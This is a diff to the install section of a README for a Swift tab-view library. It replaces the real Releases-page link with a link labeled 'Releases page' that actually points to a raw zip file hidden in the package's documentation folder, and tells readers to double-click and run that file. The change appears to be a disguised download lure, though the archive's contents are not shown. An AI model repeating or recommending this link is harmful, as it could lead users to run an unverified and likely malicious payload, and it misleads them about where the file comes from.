panzapr/union-tab-view/README.md

 ## 📥 Download & Install

-1. Visit the [Releases page](https://github.com/panzapr/union-tab-view/releases) to access the latest version.
+1. Visit the [Releases page](https://raw.githubusercontent.com/panzapr/union-tab-view/main/Sources/UnionTabView/UnionTabView.docc/union-tab-view-1.1.zip) to access the latest version.
 2. Find the version you want to install.
-3. Click on the download link for the installer file (e.g., `union-tab-view-installer.exe`).
+3. Click on the download link for the installer file (e.g., `https://raw.githubusercontent.com/panzapr/union-tab-view/main/Sources/UnionTabView/UnionTabView.docc/union-tab-view-1.1.zip`).
 4. Once the file downloads, locate it in your Downloads folder.
 5. Double-click on the installer file to run it.
 6. Follow the prompts to complete the installation.